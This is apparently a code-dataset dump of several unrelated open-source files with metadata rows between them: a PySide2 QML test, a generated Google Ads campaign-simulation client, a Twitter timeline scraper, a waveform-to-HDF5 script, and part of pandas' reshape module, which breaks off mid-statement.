qmlRegisterType, ListProperty from PySide2.QtQuick import QQuickView, QQuickItem, QQuickPaintedItem class PieSlice (QQuickPaintedItem): def __init__(self, parent = None): QQuickPaintedItem.__init__(self, parent) self._color = QColor() self._fromAngle = 0 self._angleSpan = 0 def getColor(self): return self._color def setColor(self, value): self._color = value def getFromAngle(self): return self._angle def setFromAngle(self, value): self._fromAngle = value def getAngleSpan(self): return self._angleSpan def setAngleSpan(self, value): self._angleSpan = value color = Property(QColor, getColor, setColor) fromAngle = Property(int, getFromAngle, setFromAngle) angleSpan = Property(int, getAngleSpan, setAngleSpan) def paint(self, painter): global paintCalled pen = QPen(self._color, 2) painter.setPen(pen); painter.setRenderHints(QPainter.Antialiasing, True); painter.drawPie(self.boundingRect(), self._fromAngle * 16, self._angleSpan * 16); paintCalled = True class PieChart (QQuickItem): def __init__(self, parent = None): QQuickItem.__init__(self, parent) self._name = '' self._slices = [] def getName(self): return self._name def setName(self, value): self._name = value name = Property(str, getName, setName) def appendSlice(self, _slice): global appendCalled _slice.setParentItem(self) self._slices.append(_slice) appendCalled = True slices = ListProperty(PieSlice, append=appendSlice) appendCalled = False paintCalled = False class TestQmlSupport(unittest.TestCase): def testIt(self): app = QGuiApplication([]) qmlRegisterType(PieChart, 'Charts', 1, 0, 'PieChart'); qmlRegisterType(PieSlice, "Charts", 1, 0, "PieSlice"); view = QQuickView() view.setSource(QUrl.fromLocalFile(helper.adjust_filename('registertype.qml', __file__))) view.show() QTimer.singleShot(250, view.close) app.exec_() self.assertTrue(appendCalled) self.assertTrue(paintCalled) if __name__ == '__main__': unittest.main()
lgpl-2.1
2,296,957,859,559,989,800
30.567797
96
0.651812
false
3.888309
true
false
false
googleapis/googleapis-gen
google/ads/googleads/v8/googleads-py/google/ads/googleads/v8/services/services/campaign_simulation_service/client.py
1
19104
# -*- coding: utf-8 -*- # Copyright 2020 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # from collections import OrderedDict from distutils import util import os import re from typing import Callable, Dict, Optional, Sequence, Tuple, Type, Union import pkg_resources from google.api_core import client_options as client_options_lib # type: ignore from google.api_core import exceptions as core_exceptions # type: ignore from google.api_core import gapic_v1 # type: ignore from google.api_core import retry as retries # type: ignore from google.auth import credentials as ga_credentials # type: ignore from google.auth.transport import mtls # type: ignore from google.auth.transport.grpc import SslCredentials # type: ignore from google.auth.exceptions import MutualTLSChannelError # type: ignore from google.oauth2 import service_account # type: ignore from google.ads.googleads.v8.common.types import simulation from google.ads.googleads.v8.enums.types import simulation_modification_method from google.ads.googleads.v8.enums.types import simulation_type from google.ads.googleads.v8.resources.types import campaign_simulation from google.ads.googleads.v8.services.types import campaign_simulation_service from .transports.base import CampaignSimulationServiceTransport, DEFAULT_CLIENT_INFO from .transports.grpc import CampaignSimulationServiceGrpcTransport class CampaignSimulationServiceClientMeta(type): """Metaclass for the CampaignSimulationService client. This provides class-level methods for building and retrieving support objects (e.g. transport) without polluting the client instance objects. """ _transport_registry = OrderedDict() # type: Dict[str, Type[CampaignSimulationServiceTransport]] _transport_registry['grpc'] = CampaignSimulationServiceGrpcTransport def get_transport_class(cls, label: str = None, ) -> Type[CampaignSimulationServiceTransport]: """Return an appropriate transport class. Args: label: The name of the desired transport. If none is provided, then the first transport in the registry is used. Returns: The transport class to use. """ # If a specific transport is requested, return that one. if label: return cls._transport_registry[label] # No transport is requested; return the default (that is, the first one # in the dictionary). return next(iter(cls._transport_registry.values())) class CampaignSimulationServiceClient(metaclass=CampaignSimulationServiceClientMeta): """Service to fetch campaign simulations.""" @staticmethod def _get_default_mtls_endpoint(api_endpoint): """Convert api endpoint to mTLS endpoint. Convert "*.sandbox.googleapis.com" and "*.googleapis.com" to "*.mtls.sandbox.googleapis.com" and "*.mtls.googleapis.com" respectively. Args: api_endpoint (Optional[str]): the api endpoint to convert. Returns: str: converted mTLS api endpoint. """ if not api_endpoint: return api_endpoint mtls_endpoint_re = re.compile( r"(?P<name>[^.]+)(?P<mtls>\.mtls)?(?P<sandbox>\.sandbox)?(?P<googledomain>\.googleapis\.com)?" ) m = mtls_endpoint_re.match(api_endpoint) name, mtls, sandbox, googledomain = m.groups() if mtls or not googledomain: return api_endpoint if sandbox: return api_endpoint.replace( "sandbox.googleapis.com", "mtls.sandbox.googleapis.com" ) return api_endpoint.replace(".googleapis.com", ".mtls.googleapis.com") DEFAULT_ENDPOINT = 'googleads.googleapis.com' DEFAULT_MTLS_ENDPOINT = _get_default_mtls_endpoint.__func__( # type: ignore DEFAULT_ENDPOINT ) @classmethod def from_service_account_info(cls, info: dict, *args, **kwargs): """Creates an instance of this client using the provided credentials info. Args: info (dict): The service account private key info. args: Additional arguments to pass to the constructor. kwargs: Additional arguments to pass to the constructor. Returns: CampaignSimulationServiceClient: The constructed client. """ credentials = service_account.Credentials.from_service_account_info(info) kwargs["credentials"] = credentials return cls(*args, **kwargs) @classmethod def from_service_account_file(cls, filename: str, *args, **kwargs): """Creates an instance of this client using the provided credentials file. Args: filename (str): The path to the service account private key json file. args: Additional arguments to pass to the constructor. kwargs: Additional arguments to pass to the constructor. Returns: CampaignSimulationServiceClient: The constructed client. """ credentials = service_account.Credentials.from_service_account_file( filename) kwargs['credentials'] = credentials return cls(*args, **kwargs) from_service_account_json = from_service_account_file @property def transport(self) -> CampaignSimulationServiceTransport: """Return the transport used by the client instance. Returns: CampaignSimulationServiceTransport: The transport used by the client instance. """ return self._transport @staticmethod def campaign_simulation_path(customer_id: str,campaign_id: str,type: str,modification_method: str,start_date: str,end_date: str,) -> str: """Return a fully-qualified campaign_simulation string.""" return "customers/{customer_id}/campaignSimulations/{campaign_id}~{type}~{modification_method}~{start_date}~{end_date}".format(customer_id=customer_id, campaign_id=campaign_id, type=type, modification_method=modification_method, start_date=start_date, end_date=end_date, ) @staticmethod def parse_campaign_simulation_path(path: str) -> Dict[str,str]: """Parse a campaign_simulation path into its component segments.""" m = re.match(r"^customers/(?P<customer_id>.+?)/campaignSimulations/(?P<campaign_id>.+?)~(?P<type>.+?)~(?P<modification_method>.+?)~(?P<start_date>.+?)~(?P<end_date>.+?)$", path) return m.groupdict() if m else {} @staticmethod def common_billing_account_path(billing_account: str, ) -> str: """Return a fully-qualified billing_account string.""" return "billingAccounts/{billing_account}".format(billing_account=billing_account, ) @staticmethod def parse_common_billing_account_path(path: str) -> Dict[str,str]: """Parse a billing_account path into its component segments.""" m = re.match(r"^billingAccounts/(?P<billing_account>.+?)$", path) return m.groupdict() if m else {} @staticmethod def common_folder_path(folder: str, ) -> str: """Return a fully-qualified folder string.""" return "folders/{folder}".format(folder=folder, ) @staticmethod def parse_common_folder_path(path: str) -> Dict[str,str]: """Parse a folder path into its component segments.""" m = re.match(r"^folders/(?P<folder>.+?)$", path) return m.groupdict() if m else {} @staticmethod def common_organization_path(organization: str, ) -> str: """Return a fully-qualified organization string.""" return "organizations/{organization}".format(organization=organization, ) @staticmethod def parse_common_organization_path(path: str) -> Dict[str,str]: """Parse a organization path into its component segments.""" m = re.match(r"^organizations/(?P<organization>.+?)$", path) return m.groupdict() if m else {} @staticmethod def common_project_path(project: str, ) -> str: """Return a fully-qualified project string.""" return "projects/{project}".format(project=project, ) @staticmethod def parse_common_project_path(path: str) -> Dict[str,str]: """Parse a project path into its component segments.""" m = re.match(r"^projects/(?P<project>.+?)$", path) return m.groupdict() if m else {} @staticmethod def common_location_path(project: str, location: str, ) -> str: """Return a fully-qualified location string.""" return "projects/{project}/locations/{location}".format(project=project, location=location, ) @staticmethod def parse_common_location_path(path: str) -> Dict[str,str]: """Parse a location path into its component segments.""" m = re.match(r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)$", path) return m.groupdict() if m else {} def __init__(self, *, credentials: Optional[ga_credentials.Credentials] = None, transport: Union[str, CampaignSimulationServiceTransport, None] = None, client_options: Optional[client_options_lib.ClientOptions] = None, client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO, ) -> None: """Instantiate the campaign simulation service client. Args: credentials (Optional[google.auth.credentials.Credentials]): The authorization credentials to attach to requests. These credentials identify the application to the service; if none are specified, the client will attempt to ascertain the credentials from the environment. transport (Union[str, ~.CampaignSimulationServiceTransport]): The transport to use. If set to None, a transport is chosen automatically. client_options (google.api_core.client_options.ClientOptions): Custom options for the client. It won't take effect if a ``transport`` instance is provided. (1) The ``api_endpoint`` property can be used to override the default endpoint provided by the client. GOOGLE_API_USE_MTLS_ENDPOINT environment variable can also be used to override the endpoint: "always" (always use the default mTLS endpoint), "never" (always use the default regular endpoint) and "auto" (auto switch to the default mTLS endpoint if client certificate is present, this is the default value). However, the ``api_endpoint`` property takes precedence if provided. (2) If GOOGLE_API_USE_CLIENT_CERTIFICATE environment variable is "true", then the ``client_cert_source`` property can be used to provide client certificate for mutual TLS transport. If not provided, the default SSL client certificate will be used if present. If GOOGLE_API_USE_CLIENT_CERTIFICATE is "false" or not set, no client certificate will be used. client_info (google.api_core.gapic_v1.client_info.ClientInfo): The client info used to send a user-agent string along with API requests. If ``None``, then default info will be used. Generally, you only need to set this if you're developing your own client library. Raises: google.auth.exceptions.MutualTLSChannelError: If mutual TLS transport creation failed for any reason. """ if isinstance(client_options, dict): client_options = client_options_lib.from_dict(client_options) if client_options is None: client_options = client_options_lib.ClientOptions() # Create SSL credentials for mutual TLS if needed. use_client_cert = bool(util.strtobool(os.getenv("GOOGLE_API_USE_CLIENT_CERTIFICATE", "false"))) ssl_credentials = None is_mtls = False if use_client_cert: if client_options.client_cert_source: import grpc # type: ignore cert, key = client_options.client_cert_source() ssl_credentials = grpc.ssl_channel_credentials( certificate_chain=cert, private_key=key ) is_mtls = True else: creds = SslCredentials() is_mtls = creds.is_mtls ssl_credentials = creds.ssl_credentials if is_mtls else None # Figure out which api endpoint to use. if client_options.api_endpoint is not None: api_endpoint = client_options.api_endpoint else: use_mtls_env = os.getenv("GOOGLE_API_USE_MTLS_ENDPOINT", "auto") if use_mtls_env == "never": api_endpoint = self.DEFAULT_ENDPOINT elif use_mtls_env == "always": api_endpoint = self.DEFAULT_MTLS_ENDPOINT elif use_mtls_env == "auto": api_endpoint = self.DEFAULT_MTLS_ENDPOINT if is_mtls else self.DEFAULT_ENDPOINT else: raise MutualTLSChannelError( "Unsupported GOOGLE_API_USE_MTLS_ENDPOINT value. Accepted values: never, auto, always" ) # Save or instantiate the transport. # Ordinarily, we provide the transport, but allowing a custom transport # instance provides an extensibility point for unusual situations. if isinstance(transport, CampaignSimulationServiceTransport): # transport is a CampaignSimulationServiceTransport instance. if credentials: raise ValueError('When providing a transport instance, ' 'provide its credentials directly.') self._transport = transport elif isinstance(transport, str): Transport = type(self).get_transport_class(transport) self._transport = Transport( credentials=credentials, host=self.DEFAULT_ENDPOINT ) else: self._transport = CampaignSimulationServiceGrpcTransport( credentials=credentials, host=api_endpoint, ssl_channel_credentials=ssl_credentials, client_info=client_info, ) def get_campaign_simulation(self, request: campaign_simulation_service.GetCampaignSimulationRequest = None, *, resource_name: str = None, retry: retries.Retry = gapic_v1.method.DEFAULT, timeout: float = None, metadata: Sequence[Tuple[str, str]] = (), ) -> campaign_simulation.CampaignSimulation: r"""Returns the requested campaign simulation in full detail. Args: request (:class:`google.ads.googleads.v8.services.types.GetCampaignSimulationRequest`): The request object. Request message for [CampaignSimulationService.GetCampaignSimulation][google.ads.googleads.v8.services.CampaignSimulationService.GetCampaignSimulation]. resource_name (:class:`str`): Required. The resource name of the campaign simulation to fetch. This corresponds to the ``resource_name`` field on the ``request`` instance; if ``request`` is provided, this should not be set. retry (google.api_core.retry.Retry): Designation of what errors, if any, should be retried. timeout (float): The timeout for this request. metadata (Sequence[Tuple[str, str]]): Strings which should be sent along with the request as metadata. Returns: google.ads.googleads.v8.resources.types.CampaignSimulation: A campaign simulation. Supported combinations of advertising channel type, simulation type and simulation modification method is detailed below respectively. SEARCH - CPC_BID - UNIFORM SEARCH - CPC_BID - SCALING SEARCH - TARGET_CPA - UNIFORM SEARCH - TARGET_CPA - SCALING SEARCH - TARGET_ROAS - UNIFORM SEARCH - TARGET_IMPRESSION_SHARE - UNIFORM SEARCH - BUDGET - UNIFORM SHOPPING - BUDGET - UNIFORM SHOPPING - TARGET_ROAS - UNIFORM MULTIPLE - TARGET_CPA - UNIFORM OWNED_AND_OPERATED - TARGET_CPA - DEFAULT DISPLAY - TARGET_CPA - UNIFORM """ # Create or coerce a protobuf request object. # Sanity check: If we got a request object, we should *not* have # gotten any keyword arguments that map to the request. if request is not None and any([resource_name]): raise ValueError('If the `request` argument is set, then none of ' 'the individual field arguments should be set.') # Minor optimization to avoid making a copy if the user passes # in a campaign_simulation_service.GetCampaignSimulationRequest. # There's no risk of modifying the input as we've already verified # there are no flattened fields. if not isinstance(request, campaign_simulation_service.GetCampaignSimulationRequest): request = campaign_simulation_service.GetCampaignSimulationRequest(request) # If we have keyword arguments corresponding to fields on the # request, apply these. if resource_name is not None: request.resource_name = resource_name # Wrap the RPC method; this adds retry and timeout information, # and friendly error handling. rpc = self._transport._wrapped_methods[self._transport.get_campaign_simulation] # Certain fields should be provided within the metadata header; # add these here. metadata = tuple(metadata) + ( gapic_v1.routing_header.to_grpc_metadata(( ('resource_name', request.resource_name), )), ) # Send the request. response = rpc( request, retry=retry, timeout=timeout, metadata=metadata, ) # Done; return the response. return response __all__ = ( 'CampaignSimulationServiceClient', )
apache-2.0
-7,526,720,101,945,983,000
45.144928
280
0.63505
false
4.535613
false
false
false
bmd/twittrscrapr
twittrscrapr/scrapers/timelinescrapr.py
1
1459
import logging from ..parsers import DictParser from base_scraper import TwittrScrapr log = logging.getLogger('scrapers.TimelineScrapr') class TimelineScrapr(TwittrScrapr): def __init__(self, api_keys, writer): super(TimelineScrapr, self).__init__(api_keys, writer) def _fetch_user_timeline(self, user): finished_pagination = False new_max = None results = [] parser = DictParser() while not finished_pagination: self.check_rate_limit() call_result = self.api.get_user_timeline(screen_name=user, count=200, include_rts=1, trim_user=True, max_id=new_max) if len(call_result) > 0: results.extend([parser.parse(t, user=user) for t in call_result]) new_max = str(int(call_result[-1]['id_str']) - 1) else: finished_pagination = True self.reset_time = self.api.get_lastfunction_header('x-rate-limit-reset') self.calls_remaining = self.api.get_lastfunction_header('x-rate-limit-remaining') return results @TwittrScrapr.error_handler def fetch_user_statuses(self, writer): for user in self.scrape_queue: log.info('Fetching tweets for {}'.format(user)) res = self._fetch_user_timeline(user) log.info('Got {} tweets'.format(len(res))) writer.writerows(res)
mit
-2,145,231,821,339,842,000
33.738095
112
0.592872
false
3.741026
false
false
false
astroclark/BayesSpec
waveforms/waveforms2hdf5.py
1
1186
#!/usr/bin/env python """ waveforms2hdf5.py loops over the list of waveforms defined in this script and dumps out an hdf5 file for the plus polarisation. The idea is to then compute the Shannon entropy of the waveforms using Matlab's wentropy.m function. """ import h5py import numpy as np import pmns_utils wfs='/Users/jclark/hmns_repo/results/penultimate_waveforms.txt' waveform_list=np.loadtxt(wfs,dtype=str) #waveform_list=['shen_135135_lessvisc','apr_135135'] h5_file=h5py.File('waveforms.hdf5','w') h5_snr_file=h5py.File('snr.hdf5','w') for waveform in waveform_list: # Generate waveform instance wf=pmns_utils.Waveform(waveform) # Compute the time series & SNR wf.make_wf_timeseries() wf.compute_characteristics() # Zoom in on signal peak_idx=np.argmax(wf.hplus.data.data) wf_start_idx=np.argwhere(abs(wf.hplus.data.data)>0)[0] wf_end_idx=np.argwhere(abs(wf.hplus.data.data)>0)[-1] wf_reduced = wf.hplus.data.data[wf_start_idx:wf_end_idx] h5_file[waveform] = wf_reduced h5_snr_file[waveform] = wf.snr_plus #h5_file[waveform]=wf_reduced #h5_file[waveform+'_snr']=wf.snr_plus h5_file.close() h5_snr_file.close()
gpl-2.0
-5,496,950,762,767,886,000
29.410256
78
0.713322
false
2.653244
false
false
false
Ziqi-Li/bknqgis
pandas/pandas/core/reshape/reshape.py
1
45812
# pylint: disable=E1101,E1103 # pylint: disable=W0703,W0622,W0613,W0201 from pandas.compat import range, zip from pandas import compat import itertools import re import numpy as np from pandas.core.dtypes.common import ( _ensure_platform_int, is_list_like, is_bool_dtype, needs_i8_conversion) from pandas.core.dtypes.cast import maybe_promote from pandas.core.dtypes.missing import notna import pandas.core.dtypes.concat as _concat from pandas.core.series import Series from pandas.core.frame import DataFrame from pandas.core.sparse.api import SparseDataFrame, SparseSeries from pandas.core.sparse.array import SparseArray from pandas._libs.sparse import IntIndex from pandas.core.categorical import Categorical, _factorize_from_iterable from pandas.core.sorting import (get_group_index, get_compressed_ids, compress_group_index, decons_obs_group_ids) import pandas.core.algorithms as algos from pandas._libs import algos as _algos, reshape as _reshape from pandas.core.frame import _shared_docs from pandas.util._decorators import Appender from pandas.core.index import MultiIndex, _get_na_value class _Unstacker(object): """ Helper class to unstack data / pivot with multi-level index Parameters ---------- level : int or str, default last level Level to "unstack". Accepts a name for the level. Examples -------- >>> import pandas as pd >>> index = pd.MultiIndex.from_tuples([('one', 'a'), ('one', 'b'), ... ('two', 'a'), ('two', 'b')]) >>> s = pd.Series(np.arange(1, 5, dtype=np.int64), index=index) >>> s one a 1 b 2 two a 3 b 4 dtype: int64 >>> s.unstack(level=-1) a b one 1 2 two 3 4 >>> s.unstack(level=0) one two a 1 3 b 2 4 Returns ------- unstacked : DataFrame """ def __init__(self, values, index, level=-1, value_columns=None, fill_value=None): self.is_categorical = None if values.ndim == 1: if isinstance(values, Categorical): self.is_categorical = values values = np.array(values) values = values[:, np.newaxis] self.values = values self.value_columns = value_columns self.fill_value = fill_value if value_columns is None and values.shape[1] != 1: # pragma: no cover raise ValueError('must pass column labels for multi-column data') self.index = index if isinstance(self.index, MultiIndex): if index._reference_duplicate_name(level): msg = ("Ambiguous reference to {0}. The index " "names are not unique.".format(level)) raise ValueError(msg) self.level = self.index._get_level_number(level) # when index includes `nan`, need to lift levels/strides by 1 self.lift = 1 if -1 in self.index.labels[self.level] else 0 self.new_index_levels = list(index.levels) self.new_index_names = list(index.names) self.removed_name = self.new_index_names.pop(self.level) self.removed_level = self.new_index_levels.pop(self.level) self._make_sorted_values_labels() self._make_selectors() def _make_sorted_values_labels(self): v = self.level labs = list(self.index.labels) levs = list(self.index.levels) to_sort = labs[:v] + labs[v + 1:] + [labs[v]] sizes = [len(x) for x in levs[:v] + levs[v + 1:] + [levs[v]]] comp_index, obs_ids = get_compressed_ids(to_sort, sizes) ngroups = len(obs_ids) indexer = _algos.groupsort_indexer(comp_index, ngroups)[0] indexer = _ensure_platform_int(indexer) self.sorted_values = algos.take_nd(self.values, indexer, axis=0) self.sorted_labels = [l.take(indexer) for l in to_sort] def _make_selectors(self): new_levels = self.new_index_levels # make the mask remaining_labels = self.sorted_labels[:-1] level_sizes = [len(x) for x in new_levels] comp_index, obs_ids = get_compressed_ids(remaining_labels, level_sizes) ngroups = len(obs_ids) comp_index = _ensure_platform_int(comp_index) stride = self.index.levshape[self.level] + self.lift self.full_shape = ngroups, stride selector = self.sorted_labels[-1] + stride * comp_index + self.lift mask = np.zeros(np.prod(self.full_shape), dtype=bool) mask.put(selector, True) if mask.sum() < len(self.index): raise ValueError('Index contains duplicate entries, ' 'cannot reshape') self.group_index = comp_index self.mask = mask self.unique_groups = obs_ids self.compressor = comp_index.searchsorted(np.arange(ngroups)) def get_result(self): # TODO: find a better way than this masking business values, value_mask = self.get_new_values() columns = self.get_new_columns() index = self.get_new_index() # filter out missing levels if values.shape[1] > 0: col_inds, obs_ids = compress_group_index(self.sorted_labels[-1]) # rare case, level values not observed if len(obs_ids) < self.full_shape[1]: inds = (value_mask.sum(0) > 0).nonzero()[0] values = algos.take_nd(values, inds, axis=1) columns = columns[inds] # may need to coerce categoricals here if self.is_categorical is not None: categories = self.is_categorical.categories ordered = self.is_categorical.ordered values = [Categorical(values[:, i], categories=categories, ordered=ordered) for i in range(values.shape[-1])] return DataFrame(values, index=index, columns=columns) def get_new_values(self): values = self.values # place the values length, width = self.full_shape stride = values.shape[1] result_width = width * stride result_shape = (length, result_width) mask = self.mask mask_all = mask.all() # we can simply reshape if we don't have a mask if mask_all and len(values): new_values = (self.sorted_values .reshape(length, width, stride) .swapaxes(1, 2) .reshape(result_shape) ) new_mask = np.ones(result_shape, dtype=bool) return new_values, new_mask # if our mask is all True, then we can use our existing dtype if mask_all: dtype = values.dtype new_values = np.empty(result_shape, dtype=dtype) else: dtype, fill_value = maybe_promote(values.dtype, self.fill_value) new_values = np.empty(result_shape, dtype=dtype) new_values.fill(fill_value) new_mask = np.zeros(result_shape, dtype=bool) name = np.dtype(dtype).name sorted_values = self.sorted_values # we need to convert to a basic dtype # and possibly coerce an input to our output dtype # e.g. ints -> floats if needs_i8_conversion(values): sorted_values = sorted_values.view('i8') new_values = new_values.view('i8') name = 'int64' elif is_bool_dtype(values): sorted_values = sorted_values.astype('object') new_values = new_values.astype('object') name = 'object' else: sorted_values = sorted_values.astype(name, copy=False) # fill in our values & mask f = getattr(_reshape, "unstack_{}".format(name)) f(sorted_values, mask.view('u1'), stride, length, width, new_values, new_mask.view('u1')) # reconstruct dtype if needed if needs_i8_conversion(values): new_values = new_values.view(values.dtype) return new_values, new_mask def get_new_columns(self): if self.value_columns is None: if self.lift == 0: return self.removed_level lev = self.removed_level return lev.insert(0, _get_na_value(lev.dtype.type)) stride = len(self.removed_level) + self.lift width = len(self.value_columns) propagator = np.repeat(np.arange(width), stride) if isinstance(self.value_columns, MultiIndex): new_levels = self.value_columns.levels + (self.removed_level,) new_names = self.value_columns.names + (self.removed_name,) new_labels = [lab.take(propagator) for lab in self.value_columns.labels] else: new_levels = [self.value_columns, self.removed_level] new_names = [self.value_columns.name, self.removed_name] new_labels = [propagator] new_labels.append(np.tile(np.arange(stride) - self.lift, width)) return MultiIndex(levels=new_levels, labels=new_labels, names=new_names, verify_integrity=False) def get_new_index(self): result_labels = [lab.take(self.compressor) for lab in self.sorted_labels[:-1]] # construct the new index if len(self.new_index_levels) == 1: lev, lab = self.new_index_levels[0], result_labels[0] if (lab == -1).any(): lev = lev.insert(len(lev), _get_na_value(lev.dtype.type)) return lev.take(lab) return MultiIndex(levels=self.new_index_levels, labels=result_labels, names=self.new_index_names, verify_integrity=False) def _unstack_multiple(data, clocs): if len(clocs) == 0: return data # NOTE: This doesn't deal with hierarchical columns yet index = data.index clocs = [index._get_level_number(i) for i in clocs] rlocs = [i for i in range(index.nlevels) if i not in clocs] clevels = [index.levels[i] for i in clocs] clabels = [index.labels[i] for i in clocs] cnames = [index.names[i] for i in clocs] rlevels = [index.levels[i] for i in rlocs] rlabels = [index.labels[i] for i in rlocs] rnames = [index.names[i] for i in rlocs] shape = [len(x) for x in clevels] group_index = get_group_index(clabels, shape, sort=False, xnull=False) comp_ids, obs_ids = compress_group_index(group_index, sort=False) recons_labels = decons_obs_group_ids(comp_ids, obs_ids, shape, clabels, xnull=False) dummy_index = MultiIndex(levels=rlevels + [obs_ids], labels=rlabels + [comp_ids], names=rnames + ['__placeholder__'], verify_integrity=False) if isinstance(data, Series): dummy = data.copy() dummy.index = dummy_index unstacked = dummy.unstack('__placeholder__') new_levels = clevels new_names = cnames new_labels = recons_labels else: if isinstance(data.columns, MultiIndex): result = data for i in range(len(clocs)): val = clocs[i] result = result.unstack(val) clocs = [v if i > v else v - 1 for v in clocs] return result dummy = data.copy() dummy.index = dummy_index unstacked = dummy.unstack('__placeholder__') if isinstance(unstacked, Series): unstcols = unstacked.index else: unstcols = unstacked.columns new_levels = [unstcols.levels[0]] + clevels new_names = [data.columns.name] + cnames new_labels = [unstcols.labels[0]] for rec in recons_labels: new_labels.append(rec.take(unstcols.labels[-1])) new_columns = MultiIndex(levels=new_levels, labels=new_labels, names=new_names, verify_integrity=False) if isinstance(unstacked, Series): unstacked.index = new_columns else: unstacked.columns = new_columns return unstacked def pivot(self, index=None, columns=None, values=None): """ See DataFrame.pivot """ if values is None: cols = [columns] if index is None else [index, columns] append = index is None indexed = self.set_index(cols, append=append) return indexed.unstack(columns) else: if index is None: index = self.index else: index = self[index] indexed = Series(self[values].values, index=MultiIndex.from_arrays([index, self[columns]])) return indexed.unstack(columns) def pivot_simple(index, columns, values): """ Produce 'pivot' table based on 3 columns of this DataFrame. Uses unique values from index / columns and fills with values. Parameters ---------- index : ndarray Labels to use to make new frame's index columns : ndarray Labels to use to make new frame's columns values : ndarray Values to use for populating new frame's values Notes ----- Obviously, all 3 of the input arguments must have the same length Returns ------- DataFrame See also -------- DataFrame.pivot_table : generalization of pivot that can handle duplicate values for one index/column pair """ if (len(index) != len(columns)) or (len(columns) != len(values)): raise AssertionError('Length of index, columns, and values must be the' ' same') if len(index) == 0: return DataFrame(index=[]) hindex = MultiIndex.from_arrays([index, columns]) series = Series(values.ravel(), index=hindex) series = series.sort_index(level=0) return series.unstack() def _slow_pivot(index, columns, values): """ Produce 'pivot' table based on 3 columns of this DataFrame. Uses unique values from index / columns and fills with values. Parameters ---------- index : string or object Column name to use to make new frame's index columns : string or object Column name to use to make new frame's columns values : string or object Column name to use for populating new frame's values Could benefit from some Cython here. """ tree = {} for i, (idx, col) in enumerate(zip(index, columns)): if col not in tree: tree[col] = {} branch = tree[col] branch[idx] = values[i] return DataFrame(tree) def unstack(obj, level, fill_value=None): if isinstance(level, (tuple, list)): return _unstack_multiple(obj, level) if isinstance(obj, DataFrame): if isinstance(obj.index, MultiIndex): return _unstack_frame(obj, level, fill_value=fill_value) else: return obj.T.stack(dropna=False) else: unstacker = _Unstacker(obj.values, obj.index, level=level, fill_value=fill_value) return unstacker.get_result() def _unstack_frame(obj, level, fill_value=None): from pandas.core.internals import BlockManager, make_block if obj._is_mixed_type: unstacker = _Unstacker(np.empty(obj.shape, dtype=bool), # dummy obj.index, level=level, value_columns=obj.columns) new_columns = unstacker.get_new_columns() new_index = unstacker.get_new_index() new_axes = [new_columns, new_index] new_blocks = [] mask_blocks = [] for blk in obj._data.blocks: blk_items = obj._data.items[blk.mgr_locs.indexer] bunstacker = _Unstacker(blk.values.T, obj.index, level=level, value_columns=blk_items, fill_value=fill_value) new_items = bunstacker.get_new_columns() new_placement = new_columns.get_indexer(new_items) new_values, mask = bunstacker.get_new_values() mblk = make_block(mask.T, placement=new_placement) mask_blocks.append(mblk) newb = make_block(new_values.T, placement=new_placement) new_blocks.append(newb) result = DataFrame(BlockManager(new_blocks, new_axes)) mask_frame = DataFrame(BlockManager(mask_blocks, new_axes)) return result.loc[:, mask_frame.sum(0) > 0] else: unstacker = _Unstacker(obj.values, obj.index, level=level, value_columns=obj.columns, fill_value=fill_value) return unstacker.get_result() def stack(frame, level=-1, dropna=True): """ Convert DataFrame to Series with multi-level Index. Columns become the second level of the resulting hierarchical index Returns ------- stacked : Series """ def factorize(index): if index.is_unique: return index, np.arange(len(index)) codes, categories = _factorize_from_iterable(index) return categories, codes N, K = frame.shape if isinstance(frame.columns, MultiIndex): if frame.columns._reference_duplicate_name(level): msg = ("Ambiguous reference to {0}. The column " "names are not unique.".format(level)) raise ValueError(msg) # Will also convert negative level numbers and check if out of bounds. level_num = frame.columns._get_level_number(level) if isinstance(frame.columns, MultiIndex): return _stack_multi_columns(frame, level_num=level_num, dropna=dropna) elif isinstance(frame.index, MultiIndex): new_levels = list(frame.index.levels) new_labels = [lab.repeat(K) for lab in frame.index.labels] clev, clab = factorize(frame.columns) new_levels.append(clev) new_labels.append(np.tile(clab, N).ravel()) new_names = list(frame.index.names) new_names.append(frame.columns.name) new_index = MultiIndex(levels=new_levels, labels=new_labels, names=new_names, verify_integrity=False) else: levels, (ilab, clab) = zip(*map(factorize, (frame.index, frame.columns))) labels = ilab.repeat(K), np.tile(clab, N).ravel() new_index = MultiIndex(levels=levels, labels=labels, names=[frame.index.name, frame.columns.name], verify_integrity=False) new_values = frame.values.ravel() if dropna: mask = notna(new_values) new_values = new_values[mask] new_index = new_index[mask] return Series(new_values, index=new_index) def stack_multiple(frame, level, dropna=True): # If all passed levels match up to column names, no # ambiguity about what to do if all(lev in frame.columns.names for lev in level): result = frame for lev in level: result = stack(result, lev, dropna=dropna) # Otherwise, level numbers may change as each successive level is stacked elif all(isinstance(lev, int) for lev in level): # As each stack is done, the level numbers decrease, so we need # to account for that when level is a sequence of ints result = frame # _get_level_number() checks level numbers are in range and converts # negative numbers to positive level = [frame.columns._get_level_number(lev) for lev in level] # Can't iterate directly through level as we might need to change # values as we go for index in range(len(level)): lev = level[index] result = stack(result, lev, dropna=dropna) # Decrement all level numbers greater than current, as these # have now shifted down by one updated_level = [] for other in level: if other > lev: updated_level.append(other - 1) else: updated_level.append(other) level = updated_level else: raise ValueError("level should contain all level names or all level " "numbers, not a mixture of the two.") return result def _stack_multi_columns(frame, level_num=-1, dropna=True): def _convert_level_number(level_num, columns): """ Logic for converting the level number to something we can safely pass to swaplevel: We generally want to convert the level number into a level name, except when columns do not have names, in which case we must leave as a level number """ if level_num in columns.names: return columns.names[level_num] else: if columns.names[level_num] is None: return level_num else: return columns.names[level_num] this = frame.copy() # this makes life much simpler if level_num != frame.columns.nlevels - 1: # roll levels to put selected level at end roll_columns = this.columns for i in range(level_num, frame.columns.nlevels - 1): # Need to check if the ints conflict with level names lev1 = _convert_level_number(i, roll_columns) lev2 = _convert_level_number(i + 1, roll_columns) roll_columns = roll_columns.swaplevel(lev1, lev2) this.columns = roll_columns if not this.columns.is_lexsorted(): # Workaround the edge case where 0 is one of the column names, # which interferes with trying to sort based on the first # level level_to_sort = 